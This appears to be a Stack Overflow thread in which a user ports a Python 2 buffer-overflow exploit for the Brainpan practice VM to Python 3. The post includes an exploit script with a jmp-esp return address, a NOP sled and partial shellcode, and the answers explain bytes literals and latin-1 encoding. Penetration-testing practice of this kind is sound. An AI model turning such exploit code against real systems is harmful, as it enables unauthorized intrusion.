# Using python 3 as a buffer overflow instead of Python 2

Tags: python, python-3.x, buffer-overflow

I am trying to use python3 instead of Python 2 to push a buffer overflow to Brainpan. Problem is python3 converts the bytes way differently. Does anyone know how to push the bytes In a simple way in python3 format?

Example code of the python2 code can be found at:
http://blog.pentests.pl/2014/06/pentest-lab-brainpan-probably-the-fastest.html?m=1

Taken from page:

```
import sys,socket

eip = "\xf3\x12\x17\x31" #jmp esp address 0x311712f3
buf = "\x90"*10 #nop sled
buf += "\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
buf... {Code snipped}

payload = ("a"*524) + eip + buf

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect('192.168.0.xxx', 9999)

print s.recv(1024)
s.send(payload)
print s.recv(1024)
```

I've tried `s.send(payload.encode())` with various encodings. Nothing works as far as I can tell.

Comment: what do you mean when you say it sends "way different" it should not ... one thing it does require is bytes instead of str though ... so i would hazard a guess it didnt send at all ... try `s.send(bytes(payload))`

Comment: `eip = "\xf3\x12\x17\x31"` is not bytes, it is a `str`. Use actual `bytes` objects, so here you could do: `eip = b"\xf3\x12\x17\x31"`, notice the `b` for a bytes literal.

Answer (score 3, accepted):

Try using [bytes literals](https://www.python.org/dev/peps/pep-3112/) such as

```
eip = b"\xf3\x12\x17\x31"
buf = b"\x90"*10
buf += b"\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
```

and bypass the need for encoding altogether.

Comment: If appending is done a lot and not just in this one line, `bytearray` will be much more efficient.

Comment: I tried this with no go. But I will try again tonight during my next practice session.

Comment: I swear I tried this and it didn't work. Anyhow I just retried and it totally worked. Thank you.

Comment: after more research this DOESN'T work (technically) as python3 adds the b'' header parts around the text, so you get 2 extra bytes at the beginning and 1 at the end.

Answer (score 0):

I had the same error but in addition found that any character after `\x7F` was mangled after the bad character testing; Python 3 seem to insert random `\xC2` or `\xC3` before each char. What worked was to either use byte literals throughout or `.encode('latin-1')`. There's feedback that latin-1 encoding doesn't always work, see [here](https://security.stackexchange.com/questions/212036/buffer-overflow-exploit-with-python3-wrong-return-address-written), but I didn't encounter issues with byte literals.

EDIT: You might find these usefull too. Both use Latin-1 encoding for Python 3.
http://www.cis.syr.edu/~wedu/seed/Labs_16.04/Software/Buffer_Overflow/Buffer_Overflow.pdf
https://blog.lab26.net/vulnerable-vm-walkthrough-brainpan-1-binary-exploitation/